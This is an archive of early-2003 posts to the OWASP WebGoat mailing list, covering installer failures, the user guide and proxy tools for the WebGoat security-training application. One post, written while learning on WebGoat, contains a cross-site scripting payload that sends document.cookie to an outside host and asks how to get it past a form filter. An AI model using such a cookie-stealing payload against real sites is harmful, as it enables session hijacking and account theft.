From sl2sho at yahoo.com  Wed Feb  5 10:47:22 2003
From: sl2sho at yahoo.com (Slow two Show)
Date: Wed, 5 Feb 2003 07:47:22 -0800 (PST)
Subject: [OWASP-WEBGOAT]messed up redhat 8.0 install of da goat
Message-ID: <20030205154722.77662.qmail@web11705.mail.yahoo.com>

ok so I installed apache...no problems

I installed this RPM
j2re-1_4_1_01-fcs-linux-i586.rpm...no problems

I ran this command:
"/usr/java/j2re1.4.1_01/bin/java -jar
install_WebGoat-2.0_unix.jar"

the installer comes up and looks all pretty and I
choose the defaults...and then about half the way
through it dies with this error:"Installation
aborted...java.IO.Exception: Stream closed"

this happens every time...can anybody help me out?

thanks,

-Slow2Show-

__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com



From rdawes at deloitte.co.za  Wed Feb  5 11:34:52 2003
From: rdawes at deloitte.co.za (Dawes, Rogan (ZA - Johannesburg))
Date: Wed, 5 Feb 2003 18:34:52 +0200 
Subject: [OWASP-WEBGOAT]messed up redhat 8.0 install of da goat
Message-ID: <AA8E3CBBF6E2E7489931D9F30A7BDBD81B22BE@zajnbnt006.dtt.co.za>

I'm getting this too, an a RedHat 8.0 installation, although I didn't get
the error on my first install (with the same files/RPMS/JVM, etc) on a
different RedHat 8.0 install.

It seems to not extract the WebGoat .war file correctly,and then does not
create the databases, etc. (or is that done on the first run?)

Suggestions?

Thanks

Rogan


-----Original Message-----
From: Slow two Show [mailto:sl2sho at yahoo.com] 
Sent: 05 February 2003 05:47 PM
To: owasp-webgoat at lists.sourceforge.net
Subject: [OWASP-WEBGOAT]messed up redhat 8.0 install of da goat


ok so I installed apache...no problems

I installed this RPM
j2re-1_4_1_01-fcs-linux-i586.rpm...no problems

I ran this command:
"/usr/java/j2re1.4.1_01/bin/java -jar
install_WebGoat-2.0_unix.jar"

the installer comes up and looks all pretty and I
choose the defaults...and then about half the way
through it dies with this error:"Installation
aborted...java.IO.Exception: Stream closed"

this happens every time...can anybody help me out?

thanks,

-Slow2Show-

__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com


-------------------------------------------------------
This SF.NET email is sponsored by:
SourceForge Enterprise Edition + IBM + LinuxWorld = Something 2 See!
http://www.vasoftware.com
_______________________________________________
OWASP-WEBGOAT mailing list
OWASP-WEBGOAT at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/owasp-webgoat



From bruce.mayhew at aspectsecurity.com  Wed Feb  5 12:26:28 2003
From: bruce.mayhew at aspectsecurity.com (Bruce Mayhew)
Date: Wed, 5 Feb 2003 12:26:28 -0500
Subject: [OWASP-WEBGOAT]messed up redhat 8.0 install of da goat
References: <20030205154722.77662.qmail@web11705.mail.yahoo.com>
Message-ID: <013101c2cd3b$b7aa96d0$2901a8c0@intranet.aspectsecurity.com>

The problem is that the installers have not been updated yet.

Try this one:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/owasp/webgoat/dist/install_We
bGoat-2.0_unix.jar

If you get the same error from this one, please let me know.

bruce.

----- Original Message -----
From: "Slow two Show" <sl2sho at yahoo.com>
To: <owasp-webgoat at lists.sourceforge.net>
Sent: Wednesday, February 05, 2003 10:47 AM
Subject: [OWASP-WEBGOAT]messed up redhat 8.0 install of da goat


> ok so I installed apache...no problems
>
> I installed this RPM
> j2re-1_4_1_01-fcs-linux-i586.rpm...no problems
>
> I ran this command:
> "/usr/java/j2re1.4.1_01/bin/java -jar
> install_WebGoat-2.0_unix.jar"
>
> the installer comes up and looks all pretty and I
> choose the defaults...and then about half the way
> through it dies with this error:"Installation
> aborted...java.IO.Exception: Stream closed"
>
> this happens every time...can anybody help me out?
>
> thanks,
>
> -Slow2Show-
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com
>
>
> -------------------------------------------------------
> This SF.NET email is sponsored by:
> SourceForge Enterprise Edition + IBM + LinuxWorld = Something 2 See!
> http://www.vasoftware.com
> _______________________________________________
> OWASP-WEBGOAT mailing list
> OWASP-WEBGOAT at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-webgoat
>





From bruce.mayhew at aspectsecurity.com  Wed Feb  5 12:26:44 2003
From: bruce.mayhew at aspectsecurity.com (Bruce Mayhew)
Date: Wed, 5 Feb 2003 12:26:44 -0500
Subject: [OWASP-WEBGOAT]messed up redhat 8.0 install of da goat
References: <AA8E3CBBF6E2E7489931D9F30A7BDBD81B22BE@zajnbnt006.dtt.co.za>
Message-ID: <013701c2cd3b$c0e1c020$2901a8c0@intranet.aspectsecurity.com>

The problem is that the installers have not been updated yet.

Try this one:
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/owasp/webgoat/dist/install_We
bGoat-2.0_unix.jar

If you get the same error from this one, please let me know.

bruce.

----- Original Message -----
From: "Dawes, Rogan (ZA - Johannesburg)" <rdawes at deloitte.co.za>
To: "'Slow two Show'" <sl2sho at yahoo.com>;
<owasp-webgoat at lists.sourceforge.net>
Sent: Wednesday, February 05, 2003 11:34 AM
Subject: RE: [OWASP-WEBGOAT]messed up redhat 8.0 install of da goat


> I'm getting this too, an a RedHat 8.0 installation, although I didn't get
> the error on my first install (with the same files/RPMS/JVM, etc) on a
> different RedHat 8.0 install.
>
> It seems to not extract the WebGoat .war file correctly,and then does not
> create the databases, etc. (or is that done on the first run?)
>
> Suggestions?
>
> Thanks
>
> Rogan
>
>
> -----Original Message-----
> From: Slow two Show [mailto:sl2sho at yahoo.com]
> Sent: 05 February 2003 05:47 PM
> To: owasp-webgoat at lists.sourceforge.net
> Subject: [OWASP-WEBGOAT]messed up redhat 8.0 install of da goat
>
>
> ok so I installed apache...no problems
>
> I installed this RPM
> j2re-1_4_1_01-fcs-linux-i586.rpm...no problems
>
> I ran this command:
> "/usr/java/j2re1.4.1_01/bin/java -jar
> install_WebGoat-2.0_unix.jar"
>
> the installer comes up and looks all pretty and I
> choose the defaults...and then about half the way
> through it dies with this error:"Installation
> aborted...java.IO.Exception: Stream closed"
>
> this happens every time...can anybody help me out?
>
> thanks,
>
> -Slow2Show-
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com
>
>
> -------------------------------------------------------
> This SF.NET email is sponsored by:
> SourceForge Enterprise Edition + IBM + LinuxWorld = Something 2 See!
> http://www.vasoftware.com
> _______________________________________________
> OWASP-WEBGOAT mailing list
> OWASP-WEBGOAT at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-webgoat
>
>
> -------------------------------------------------------
> This SF.NET email is sponsored by:
> SourceForge Enterprise Edition + IBM + LinuxWorld = Something 2 See!
> http://www.vasoftware.com
> _______________________________________________
> OWASP-WEBGOAT mailing list
> OWASP-WEBGOAT at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-webgoat
>





From gufcab at hotmail.com  Thu Feb  6 11:34:40 2003
From: gufcab at hotmail.com (gufcab)
Date: Thu, 6 Feb 2003 08:34:40 -0800
Subject: [OWASP-WEBGOAT]User Guide
References: <200301302230.h0UMU2dx011030@mailserver4.hushmail.com>
Message-ID: <OE43eLjCdclVXOK7S8M0000158b@hotmail.com>

Ditto

----- Original Message -----
From: <roodee at hush.com>
To: <owasp-webgoat at lists.sourceforge.net>
Sent: Thursday, January 30, 2003 2:30 PM
Subject: [OWASP-WEBGOAT]User Guide


>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> I saw message on the archive a couple of days ago regarding the user
guide. I'd like to take a look at it if anyone has it handy.
>
> - -r
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.2 (Java)
> Note: This signature can be verified at https://www.hushtools.com/verify
>
>
wlcEARECABcFAj45pz0QHHJvb2RlZUBodXNoLmNvbQAKCRA92QVl62lg7al9AKC1eb4j2LS5doHy
lk7rgXza1za3PQCfTZvbI/nQktyl2rVoLSFt5jB5oF8==NfV1
> -----END PGP SIGNATURE-----



From bruce.mayhew at aspectsecurity.com  Thu Feb  6 11:51:22 2003
From: bruce.mayhew at aspectsecurity.com (Bruce Mayhew)
Date: Thu, 6 Feb 2003 11:51:22 -0500
Subject: [OWASP-WEBGOAT]User Guide
References: <200301302230.h0UMU2dx011030@mailserver4.hushmail.com> <OE43eLjCdclVXOK7S8M0000158b@hotmail.com>
Message-ID: <003501c2cdff$fad087c0$2901a8c0@intranet.aspectsecurity.com>

try this

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/owasp/webgoat/doc/UserGuide01
.3.2.pdf


bruce.


----- Original Message -----
From: "gufcab" <gufcab at hotmail.com>
To: <owasp-webgoat at lists.sourceforge.net>
Sent: Thursday, February 06, 2003 11:34 AM
Subject: Re: [OWASP-WEBGOAT]User Guide


> Ditto
>
> ----- Original Message -----
> From: <roodee at hush.com>
> To: <owasp-webgoat at lists.sourceforge.net>
> Sent: Thursday, January 30, 2003 2:30 PM
> Subject: [OWASP-WEBGOAT]User Guide
>
>
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> >
> > I saw message on the archive a couple of days ago regarding the user
> guide. I'd like to take a look at it if anyone has it handy.
> >
> > - -r
> > -----BEGIN PGP SIGNATURE-----
> > Version: Hush 2.2 (Java)
> > Note: This signature can be verified at https://www.hushtools.com/verify
> >
> >
>
wlcEARECABcFAj45pz0QHHJvb2RlZUBodXNoLmNvbQAKCRA92QVl62lg7al9AKC1eb4j2LS5doHy
> lk7rgXza1za3PQCfTZvbI/nQktyl2rVoLSFt5jB5oF8==NfV1
> > -----END PGP SIGNATURE-----
>
>
> -------------------------------------------------------
> This SF.NET email is sponsored by:
> SourceForge Enterprise Edition + IBM + LinuxWorld = Something 2 See!
> http://www.vasoftware.com
> _______________________________________________
> OWASP-WEBGOAT mailing list
> OWASP-WEBGOAT at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-webgoat
>





From glyng at bigfoot.com  Thu Feb  6 13:24:22 2003
From: glyng at bigfoot.com (Glyn)
Date: Thu, 6 Feb 2003 18:24:22 -0000
Subject: [OWASP-WEBGOAT]User Guide
In-Reply-To: <003501c2cdff$fad087c0$2901a8c0@intranet.aspectsecurity.com>
Message-ID: <003b01c2ce0c$f8817bc0$8245a8c0@toolrack>

Hi guys,

I notice a few 'features' had crept into the PDF.  Please find attached
a fixed & print-optimised version.

Bill - I'll send over the updated .sxw source tomorrow.

Cheers,
Glyn.

> -----Original Message-----
> From: owasp-webgoat-admin at lists.sourceforge.net 
> [mailto:owasp-webgoat-admin at lists.sourceforge.net] On Behalf 
> Of Bruce Mayhew
> Sent: 06 February 2003 16:51
> To: gufcab; owasp-webgoat at lists.sourceforge.net
> Subject: Re: [OWASP-WEBGOAT]User Guide
> 
> 
> try this
> 
> http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/owasp/webgoat/d
> oc/UserGuide01
> .3.2.pdf
> 
> 
> bruce.
> 
> 
> ----- Original Message -----
> From: "gufcab" <gufcab at hotmail.com>
> To: <owasp-webgoat at lists.sourceforge.net>
> Sent: Thursday, February 06, 2003 11:34 AM
> Subject: Re: [OWASP-WEBGOAT]User Guide
> 
> 
> > Ditto
> >
> > ----- Original Message -----
> > From: <roodee at hush.com>
> > To: <owasp-webgoat at lists.sourceforge.net>
> > Sent: Thursday, January 30, 2003 2:30 PM
> > Subject: [OWASP-WEBGOAT]User Guide
> >
> >
> > >
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > >
> > > I saw message on the archive a couple of days ago 
> regarding the user
> > guide. I'd like to take a look at it if anyone has it handy.
> > >
> > > - -r
> > > -----BEGIN PGP SIGNATURE-----
> > > Version: Hush 2.2 (Java)
> > > Note: This signature can be verified at 
> > > https://www.hushtools.com/verify
> > >
> > >
> >
> wlcEARECABcFAj45pz0QHHJvb2RlZUBodXNoLmNvbQAKCRA92QVl62lg7al9AK
> C1eb4j2LS5doHy
> > lk7rgXza1za3PQCfTZvbI/nQktyl2rVoLSFt5jB5oF8==NfV1
> > > -----END PGP SIGNATURE-----
> >
> >
> > -------------------------------------------------------
> > This SF.NET email is sponsored by:
> > SourceForge Enterprise Edition + IBM + LinuxWorld = 
> Something 2 See! 
> > http://www.vasoftware.com 
> > _______________________________________________
> > OWASP-WEBGOAT mailing list OWASP-WEBGOAT at lists.sourceforge.net
> > https://lists.sourceforge.net/lists/listinfo/owasp-webgoat
> >
> 
> 
> 
> 
> -------------------------------------------------------
> This SF.NET email is sponsored by:
> SourceForge Enterprise Edition + IBM + LinuxWorld = Something 
> 2 See! http://www.vasoftware.com 
> _______________________________________________
> OWASP-WEBGOAT mailing list
> OWASP-WEBGOAT at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-webgoat
> 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: UserGuide01p.pdf
Type: application/pdf
Size: 317141 bytes
Desc: not available
Url : http://lists.owasp.org/pipermail/owasp-webgoat/attachments/20030206/7029e315/attachment.pdf 

From Sylvain.Maret at e-xpertsolutions.com  Tue Feb 11 03:04:03 2003
From: Sylvain.Maret at e-xpertsolutions.com (Sylvain.Maret at e-xpertsolutions.com)
Date: Tue, 11 Feb 2003 09:04:03 +0100
Subject: [OWASP-WEBGOAT]Newbie: XSS and Webgoat
Message-ID: 
    <OF47CA2F2B.1E73FD5D-ONC1256CCA.002BCECA@e-xpert.e-xpertsolutions.com>

Hello,

I'am playing with XSS in order to learn how it works. I'd like to send out 
the session cookie with this kind of script:



<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' 
+document.cookie</script> 

My problem is that the form do not accept this 'http://bla......... !!

Do you have an idea if I can code this hostile script ?

Many thanks for your help,

Sylvain Maret



<FONT SIZE = 1 FACE="VERDANA,ARIAL">
-----------------------------------------------------------------
DISCLAIMER
This email and any files transmitted with it, including replies
and forwarded copies (which may contain alterations)
subsequently transmitted from the Company, are confidential
and solely for the use of the intended recipient. It may contain
material protected by attorney-client privilege. The contents
do not represent the opinion of e-Xpert Solutions SA except
to the extent that it relates to their official business.
If you are not the intended recipient or the person responsible
for delivering to the intended recipient, be advised that you
have received this email in error and that any use is strictly
prohibited. If you are not the intended recipient, please advise
the sender by return e-mail, then delete this message and any
attachments.
e-Xpert Solutions SA: info at e-xpertsolutions.com
</FONT>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.owasp.org/pipermail/owasp-webgoat/attachments/20030211/342d0600/attachment.html 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/gif
Size: 8670 bytes
Desc: not available
Url : http://lists.owasp.org/pipermail/owasp-webgoat/attachments/20030211/342d0600/attachment.gif 

From limkokhe at comp.nus.edu.sg  Fri Feb 14 18:56:00 2003
From: limkokhe at comp.nus.edu.sg (Edmund Lim Kok Heng)
Date: Sat, 15 Feb 2003 07:56:00 +0800
Subject: [OWASP-WEBGOAT]just saying hi to the list
Message-ID: <3E4D820F.9FAD688B@comp.nus.edu.sg>

Hi all,

I'm new to this list, the site said to introduce yourself so here
I am :)

I'm currently still an undergraduate, but java is my native,
I'm also interested in web security so joining this list
seemed to make sense :)

I'm new to developement, but I'm comfortable with coding
and have a few hours to spare, so I hope to contribute
something.... hmmm yup thats about it :)

Good day!
Ed

--
++++++++++++++++++++++++++++++++++++++++++++++
"There is a place in your brain, I think, reserved for 'the melancholy
of relationships past.'It grows and prospers as life progresses,
forcing you finally, against your grain, to listen to country music."

(K.B. Mullis et al., eds., The Polymerase Chain Reaction,
Birkhauser: Boston, 1995, p. 427).
++++++++++++++++++++++++++++++++++++++++++++++





From 25eglt702 at sneakemail.com  Sat Feb 15 15:39:53 2003
From: 25eglt702 at sneakemail.com (ejm)
Date: Sat, 15 Feb 2003 10:39:53 -1000
Subject: [OWASP-WEBGOAT]Re: OWASP-WEBGOAT digest, Vol 1 #42 - 1 msg
Message-ID: <1292-86079@sneakemail.com>

An HTML attachment was scrubbed...
URL: http://lists.owasp.org/pipermail/owasp-webgoat/attachments/20030215/cd1cc32b/attachment.html 

From mads at opencs.com.br  Mon Feb 17 15:24:35 2003
From: mads at opencs.com.br (Mads Rasmussen)
Date: Mon, 17 Feb 2003 17:24:35 -0300
Subject: [OWASP-WEBGOAT]OpenProxy - how to get it?
Message-ID: <23F980CFF4C45B4792FFF3CE015C541A025B93@olimpia.opencs.com.br>

 
In the new WebGoat guide, Open Proxy is recommended as assessment tool,
I remember that it was (or still is?) a part of the webscarab project, I
then did a cvs download of webscarab, but didn't find much related to
OpenProxy.
 
Can someone help? Is there a packaged version coming?
 
Mads



From mark at curphey.com  Mon Feb 17 15:35:23 2003
From: mark at curphey.com (Mark Curphey)
Date: 17 Feb 2003 12:35:23 -0800
Subject: [OWASP-WEBGOAT]OpenProxy - how to get it?
In-Reply-To: <23F980CFF4C45B4792FFF3CE015C541A025B93@olimpia.opencs.com.br>
References: <23F980CFF4C45B4792FFF3CE015C541A025B93@olimpia.opencs.com.br>
Message-ID: <1045514122.1037.1019.camel@localhost.localdomain>

There is a packaged version coming very soon. In the interim time take a
look at Pen Proxy which is also now an OWASP project and will be built
into WebScarab.

http://shh.thathost.com/pub-java/files/PenProxy-0.4.5.zip


On Mon, 2003-02-17 at 12:24, Mads Rasmussen wrote:
>  In the new WebGoat guide, Open Proxy is recommended as assessment tool,
> I remember that it was (or still is?) a part of the webscarab project, I
> then did a cvs download of webscarab, but didn't find much related to
> OpenProxy.
>  
> Can someone help? Is there a packaged version coming?
>  
> Mads
> 
> 
> -------------------------------------------------------
> This sf.net email is sponsored by:ThinkGeek
> Welcome to geek heaven.
> http://thinkgeek.com/sf
> _______________________________________________
> OWASP-WEBGOAT mailing list
> OWASP-WEBGOAT at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-webgoat
-- 
Mark Curphey <mark at curphey.com>




From bill at owasp.org  Mon Feb 24 15:16:53 2003
From: bill at owasp.org (bill)
Date: Mon, 24 Feb 2003 15:16:53 -0500 (EST)
Subject: [OWASP-WEBGOAT] Lesson Plans
In-Reply-To: <23F980CFF4C45B4792FFF3CE015C541A025B93@olimpia.opencs.com.br> from Mads Rasmussen <mads@opencs.com.br> on Mon, 17 Feb 2003 17:24:35 -0300
Message-ID: <200302242016.PAA05241@alexander.cnchost.com>

An embedded and charset-unspecified text was scrubbed...
Name: not available
Url: http://lists.owasp.org/pipermail/owasp-webgoat/attachments/20030224/1e2ac6e9/attachment.pl 

